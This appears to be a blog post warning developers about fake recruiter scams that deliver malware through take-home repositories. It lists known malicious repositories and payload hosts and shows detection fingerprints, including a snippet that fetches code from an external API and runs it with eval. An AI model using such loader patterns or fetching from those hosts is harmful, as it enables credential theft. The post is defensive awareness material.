Watch out - that recruiter profile might be a scam. Check here first.
This is part 3 of the recruiter scam series.
Read these first:
- Watch out, your recruiter might be a scam
- How to safely inspect a repository before running anything on your machine
Now the shorter warning:
Before you reply to a suspicious recruiter, check the community list.
github.com/xndbogdan/malicious-repositories
That repository collects malicious projects, payload delivery APIs, scammer LinkedIn profiles, and real examples from developers who were targeted. It exists because people kept receiving fake technical interviews that were actually malware delivery attempts.
Use it.
If a recruiter sends you a repository, a Calendly link, a Google Doc full of roles, or a “quick technical assessment”, check there first.
the list exists for a reason
The repo says the samples were collected from scammers attempting to steal credentials through LinkedIn. It also says the code should not be run or even installed.
That is the correct warning level.
The collection includes bait repositories that look like normal Web3, crypto, rental, real estate, game, staking, or MVP projects:
- real_estate
- real_estate_new
- real_estate_platform_mvp_v1
- multify_staking
- DEX-staking-project-ultrax
- erc20-token-dapp
- munity-game
- web3game
- golden-city
- sarostech-assessment
- challenge-experiment-module
- coinpool-rental-platform1.0
- real-estate-rental-platform
The pattern is boring because it works: the repo looks like a legitimate take-home assignment, and the developer is pressured to clone it and run it locally.
Do not be the next sample.
the J-Soft Labs case
One documented variant used a fake company called J-Soft Labs.
It had the kind of surface area that makes people lower their guard:
- a LinkedIn company page
- a “Senior Recruiter” profile
- a hijacked real professional profile renamed into a CTO persona
- a Calendly scheduling flow
- a Google Doc with multiple job roles
- a repository framed as a normal technical assessment
That is not a lone scammer improvising in your DMs.
That is an operation.
The community write-up also notes a command-and-control path containing /api/ipcheck-encrypted/603_1, which suggests the pipeline was already broad when it was caught.
That is the part people underestimate. These campaigns are not only trying one candidate at a time. They are running a funnel.
known repos and APIs to check
The community list names several known scam repositories and delivery points. If any of these appear in your interview process, stop:
- https://api.npoint.io/
- https://bitbucket.org/coinpool/rental-platform1.0/
- https://github.com/MetaBuilderGroup76/challenge-experiment-module
- https://github.com/SuperDev313/Trading_Platform_Ultrax
- https://github.com/Peiko-Tech-Org/Peiko-Platform-MVP/
The point is not that these are the only bad links.
The point is that the shape is recognizable: disposable repos, external payload APIs, crypto or Web3 framing, and just enough polish to make a rushed developer continue.
the technical fingerprint
You do not need to reverse engineer malware to spot the smell.
Look for these patterns.
1. eval fed by an external API
```javascript
const result = await axios.get("https://api.npoint.io/ac2916e3f543effa2edd");
eval(result.data.cookie);
```
This means the code you reviewed is not the code that runs. The payload arrives later.
2. Function.constructor instead of obvious eval
```javascript
const handler = new Function.constructor("require", errCode);
handler(require);
```
This is still dynamic code execution. It is just trying to dodge simple searches.
3. base64 C2 URLs in example config
If .env.example contains encoded URLs, treat that as hostile until proven otherwise.
.env.example looks harmless because developers assume it is documentation. In these scams, it can become configuration for the loader immediately after clone or setup.
4. byte arrays that decode into URLs
```javascript
const byteArray = [104, 116, 116, 112, 115, 58, 47, 47];
const endpoint = String.fromCharCode(...byteArray);
```
That decodes to the beginning of https://.
If a take-home assignment hides a URL like this, you already have your answer.
5. Vercel-hosted second stages
Many payloads use disposable *.vercel.app infrastructure.
The domain might be gone by the time you inspect it. That does not make the repo safe. It means the attacker can replace infrastructure faster than you can bookmark indicators.
6. one commit: “Initial Version”
Most real projects have history.
Many scam repos do not. A single commit named Initial Version, especially around crypto/Web3 projects from unknown accounts, should raise your guard.
what to do before engaging
Use this flow before you reply, schedule, or clone.
- Search the recruiter profile URL in the community repo.
- Search the company name in the community repo.
- Search the repository URL in the known scam list.
- Check whether the company exists outside LinkedIn.
- Check whether the recruiter has real history, posts, mutual connections, and consistent employment.
- Scan the repo at scanrepo.dev before touching it locally.
- If you find a new scam profile or repo, open an issue or PR in xndbogdan/malicious-repositories.
That last step matters.
The list only works because targeted developers report what they see. Two minutes of reporting can save the next person from running the payload.
LinkedIn red flags
Compensation red flags:
- pay is unusually high for the role
- the role details are vague
- banking or personal information appears early
Profile red flags:
- recently created profile
- no posts or engagement
- no mutual connections
- no recommendations
- title does not match history
- company has no real web presence outside LinkedIn
Process red flags:
- interview process moves too fast
- pressure to act immediately
- recruiter wants to move off LinkedIn quickly
- technical test is “clone this repo and run it locally”
- they resist sandboxing, Codespaces, or a safer environment
A real recruiter can survive basic verification.
A fake one usually gets impatient.
the simple rule
Do not treat recruiter profiles as identity.
Treat them as claims.
Check the claims.
Check the company.
Check the repo.
Check the community list:
github.com/xndbogdan/malicious-repositories
Then scan the repo:
scanrepo.dev
And if you find a new scam, report it back.
This is how the community makes the next attack less effective.